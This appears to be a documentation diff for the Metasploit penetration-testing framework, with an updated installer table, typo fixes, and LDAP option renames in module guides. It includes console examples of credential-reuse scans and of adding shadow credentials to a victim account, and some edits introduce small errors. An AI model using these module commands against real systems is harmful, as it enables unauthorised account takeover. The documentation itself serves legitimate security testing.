-| [metasploit-4.19.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.asc)|
-| [metasploit-4.19.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.asc)|
-| [metasploit-4.19.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.asc)|
-| [metasploit-4.18.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.asc)|
-| [metasploit-4.18.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.asc)|
-| [metasploit-4.17.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.asc)|
-| [metasploit-4.17.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.asc)|
+| Download Link                                                                                                                                                |File Type| SHA                                                                                                                       | PGP                                                                                                                      |
+|--------------------------------------------------------------------------------------------------------------------------------------------------------------|-|---------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|
+| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
+| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.6-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.6-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.5-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.5-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.4-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.4-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.3-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.3-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.2-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)   |
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc) |
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)   |
+| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc) |
+| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)   |
+| [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc) |
+| [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)   |
+| [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc) |
+| [metasploit-4.19.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.asc)   |
+| [metasploit-4.19.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.asc) |
+| [metasploit-4.19.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.asc)   |
+| [metasploit-4.18.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.asc) |
+| [metasploit-4.18.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.asc)   |
+| [metasploit-4.17.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.asc) |
+| [metasploit-4.17.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.asc)   |


 ## Metasploit Framework Source
@@ -6,7 +6,7 @@ Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://g

 ### Retain active status of authentication tokens

-Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
+Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authentication tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.

 Difficulty: 2/5

@@ -52,7 +52,7 @@ Which returns the following response:

 ### Start the server

-Use the following command to run the server with a configured uesrname and password:
+Use the following command to run the server with a configured username and password:

 ```
 $ ruby msfrpcd -U user -P pass -f
@@ -6,7 +6,7 @@ The term 'repo' is short for 'Repository.' Also known as 'fork' (as a noun).

 ## The Easy Way

-The easiest way to keep in sync with master is to trash your fork of `metasploit-framework`, and re-fork. This is a surprisingly common practice, since most people in the world don't work with Metasploit every day. If you're the sort to be struck by hackerish inspiration every few months, and couldn't give a whit about preserving branches, history, or pull requests, simply nuke your local fork.
+The easiest way to keep in sync with master is to trash your fork of `metasploit-framework`, and re-fork. This is a surprisingly common practice, since most people in the world don't work with Metasploit every day. If you're the sort to be struck by hackerish inspiration every few months, and couldn't give a with about preserving branches, history, or pull requests, simply nuke your local fork.

 On your fork, in the GitHub UI, go to **Settings**, scroll down to the **Danger Zone**, and hit **Delete this repository**. Once you've re-authenticated, re-fork the `metasploit-framework` repository by going to the [Rapid7 repo](https://github.com/rapid7/metasploit-framework) and hit **Fork** as hard as you possibly can.

@@ -49,7 +49,7 @@ use auxiliary/scanner/mysql/mysql_login
 run 'mysql://root: a b c p4$$w0rd@127.0.0.1'
 ```

-Re-using MySQL credentials in a subnet:
+Reusing MySQL credentials in a subnet:

 ```
 use auxiliary/scanner/mysql/mysql_login
@@ -51,7 +51,7 @@ use auxiliary/scanner/postgres/postgres_login
 run 'postgres://root: a b c p4$$w0rd@127.0.0.1'
 ```

-Re-using PostgreSQL credentials in a subnet:
+Reusing PostgreSQL credentials in a subnet:

 ```
 use auxiliary/scanner/postgres/postgres_login
@@ -115,7 +115,7 @@ use scanner/ssh/ssh_login
 run ssh://user:pass@172.18.102.20
 ```

-Re-using SSH credentials in a subnet:
+Reusing SSH credentials in a subnet:

 ```
 use scanner/ssh/ssh_login
@@ -118,9 +118,9 @@ The values that are common to both `HTTP(S)` and `TCP` transports are:
    * `tcp://:<port>` - indicates that this payload is a _bind_ payload listening on the specified port (note that no host is specified).
    * `http://<host>:<port>/<uri>` - indicates that this payload is an HTTP connection (can only be _reverse_).
    * `https://<host>:<port>/<uri>` - indicates that this payload is an HTTPS connection (can only be _reverse_).
-* **Communications expiry** - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the **Timeout documentation** (link coming soon).
-* **Retry total** - This value is 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the **Timeout documentation** (link coming soon).
-* **Retry wait** - This value is 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the **Timeout documentation** (link coming soon).
+* **Communications expiry** - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.
+* **Retry total** - This value is 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.
+* **Retry wait** - This value is 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.

 The layout of this block in memory looks like the following:

@@ -159,8 +159,8 @@ At this time, there are no `TCP`-specific configuration values, as the common co
    * `http://<proxy ip>:<proxy port>` in the case of `HTTP` proxies.
    * `socks=<socks ip>:<sock port>` in the case of `socks` proxies.
 * **Proxy user name** - Some proxies require authentication. In such cases, this value contains the username that should be used to authenticate with the given proxy. This field is `64` characters in size (`wchar_t`).
-* Proxy password - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also `64` characters in size (`wchar_t`).
-*** User agent string** - Customisable user agent string. This changes the user agent that is used when `HTTP/S` requests are made to Metasploit. This field is `256` characters in size (`wchar_t`).
+* **Proxy password** - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also `64` characters in size (`wchar_t`).
+* **User agent string** - Customisable user agent string. This changes the user agent that is used when `HTTP/S` requests are made to Metasploit. This field is `256` characters in size (`wchar_t`).
 * **Expected SSL certificate hash** - Meterpreter has the capability of validating the SSL certificate that Metasploit presents when using `HTTPS`. This value contains the `20`-byte SHA1 hash of the expected certificate. For more information, please read the **SSL certificate validation documentation** (link coming soon).

 All values that are shown above need to be specified in the configuration, including SSL certificate validation for plain `HTTP` connections. Values that are not used should be zeroed out.
@@ -207,7 +207,7 @@ As already mentioned, more than one of these transport configuration blocks can

 ### Extension configuration block

-The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have **Stageless payloads** (link coming soon), and to provide the means for sharing of extensions during migration (though this hasn't been implemented yet). Each of the extensions must have been compiled with [Reflective DLL Injection](https://github.com/rapid7/ReflectiveDLLInjection/) support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the **Stageless payloads** (link coming soon) documentation.
+The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have [[Stageless payloads|./Meterpreter-Stageless-Mode.md]], and to provide the means for sharing of extensions during migration (though this hasn't been implemented yet). Each of the extensions must have been compiled with [Reflective DLL Injection](https://github.com/rapid7/ReflectiveDLLInjection/) support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the [[Stageless payloads|./Meterpreter-Stageless-Mode.md]] documentation.

 The extension configuration block also functions as a "list" to allow for an arbitrary number of extensions to be included. Each extension entry needs to contain:

@@ -71,7 +71,7 @@ Related open tickets (slightly broader than Meterpreter):
 * Change desktop/phone background
 * Remote mouse control
 * Play sound on the remote system
- * Read words outloud via text to speech on the remote system
+ * Read words out loud via text to speech on the remote system
 * Volume control
 * RSS feed from reverse_http(s) mult-handler that I can connect a RSS reader to (or something like IFTTT) and get notices when new sessions are created
 * MessageBox popups
@@ -195,7 +195,7 @@ Payload options (cmd/windows/powershell_reverse_tcp):
   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         172.19.182.171   yes       The listen address (an interface may be speci
-                                            fied)
+                                            field)
   LOAD_MODULES                   no        A list of powershell modules separated by a c
                                            omma to download over the web
   LPORT         4444             yes       The listen port
@@ -7,7 +7,7 @@ Allows changing or resetting users' passwords over the LDAP protocol (particular

 Note that users can typically not reset their own passwords (unless they have very high privileges), but can usually change their password as long as they know the existing one.

-This module works with existing sessions (or relaying), especially for Resetting, wherein the target's password is not required.
+This module works with existing sessions (or relaying), especially for resetting, wherein the target's password is not required.

 ## Actions

@@ -19,14 +19,14 @@ This module works with existing sessions (or relaying), especially for Resetting
 The required options are based on the action being performed:

 - When resetting a password, you must specify the `TARGET_USER`
- When changing a password, you must specify the `USERNAME` and `PASSWORD`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
+- When changing a password, you must specify the `LDAPUsername` and `LDAPPassword`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
 - The `NEW_PASSWORD` option must always be provided

-**USERNAME**
+**LDAPUsername**

 The username to use to authenticate to the server. Required for changing a password, even if using an existing session.

-**PASSWORD**
+**LDAPPassword**

 The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).

@@ -65,7 +65,7 @@ PropagationFlags      : None
 ## Module usage
 1. `use auxiliary/admin/ldap/shadow_credentials`
 2. Set the `RHOST` value to a target domain controller
-3. Set the `USERNAME` and `PASSWORD` information to an account with the necessary privileges
+3. Set the `LDAPUsername` and `LDAPPassword` information to an account with the necessary privileges
 4. Set the `TARGET_USER` to the victim account
 5. Use the `ADD` action to add a credential entry to the victim account

@@ -109,13 +109,8 @@ Module options (auxiliary/admin/ldap/shadow_credentials):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
-   DOMAIN                        no        The domain to authenticate to
-   PASSWORD                      no        The password to authenticate with
-   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT        389              yes       The target port
   SSL          false            no        Enable SSL on the LDAP connection
   TARGET_USER                   yes       The target to write to
-   USERNAME                      no        The username to authenticate with


   When ACTION is REMOVE:
@@ -125,6 +120,24 @@ Module options (auxiliary/admin/ldap/shadow_credentials):
   DEVICE_ID                   no        The specific certificate ID to operate on


+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         389              no        The target port
+
+
 Auxiliary action:

   Name  Description
@@ -137,12 +150,12 @@ View the full module info with the info, or info -d command.

 msf6 auxiliary(admin/ldap/shadow_credentials) > set rhosts 20.92.148.129
 rhosts => 20.92.148.129
-msf6 auxiliary(admin/ldap/shadow_credentials) > set domain MSF.LOCAL
-domain => MSF.LOCAL
-msf6 auxiliary(admin/ldap/shadow_credentials) > set username sandy
-username => sandy
-msf6 auxiliary(admin/ldap/shadow_credentials) > set password Password1!
-password => Password1!
+msf6 auxiliary(admin/ldap/shadow_credentials) > set ldapdomain MSF.LOCAL
+ldapdomain => MSF.LOCAL
+msf6 auxiliary(admin/ldap/shadow_credentials) > set ldapusername sandy
+ldapusername => sandy
+msf6 auxiliary(admin/ldap/shadow_credentials) > set ldappassword Password1!
+ldappassword => Password1!
 msf6 auxiliary(admin/ldap/shadow_credentials) > set target_user victim
 target_user => victim
 msf6 auxiliary(admin/ldap/shadow_credentials) > set action add
@@ -205,7 +218,7 @@ Administrator:500:aad3b435b51404eeaad3b435b51404ee:26f8220ed7f1494c5737bd552e661
 In the following example the user `MSF\DESKTOP-H4VEQQHQ$` targets itself. No special permissions are required for this, as computers have some ability to modify their own value by default.

 ```msf
-msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
 [*] Running module against 20.92.148.129

 [+] Successfully bound to the LDAP server!
@@ -220,7 +233,7 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username
 Note, however, that attempting to add a second credential will fail under these circumstances:

 ```msf
-msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ ldappassword=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
 [*] Running module against 20.92.148.129

 [+] Successfully bound to the LDAP server!
@@ -240,7 +253,7 @@ for any legitimate user relying on the existing value.
 ```msf
 msf6 auxiliary(admin/ldap/shadow_credentials) > set action flush
 action => flush
-msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ ldappassword=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
 [*] Running module against 20.92.148.129

 [+] Successfully bound to the LDAP server!
@@ -251,7 +264,7 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/ldap/shadow_credentials) > set action add
 action => add
-msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ ldappassword=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
 [*] Running module against 20.92.148.129

 [+] Successfully bound to the LDAP server!
@@ -32,13 +32,13 @@ Add an admin user to the vCenter Server.
 If you already have the LDAP base DN, you may set it in this option.
 `dc=vsphere,dc=local` will be used if not set.

-### USERNAME
+### LDAPUsername

 If you already have a password to authenticate to the LDAP server (see
 USERNAME), this option let you setup the bind username in DN format (e.g
 `cn=1.2.3.4,ou=Domain Controllers,dc=vsphere,dc=local`).

-### PASSWORD
+### LDAPPassword

 The password to authenticate to the LDAP server, if you have it.

@@ -55,22 +55,35 @@ Set this to the password for the new admin user.
 ### VMware vCenter Server 6.7 virtual appliance on ESXi (vulnerable target)

 ```
-msf5 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
-msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options
+msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show options

 Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BASE_DN                        no        LDAP base DN if you already have it
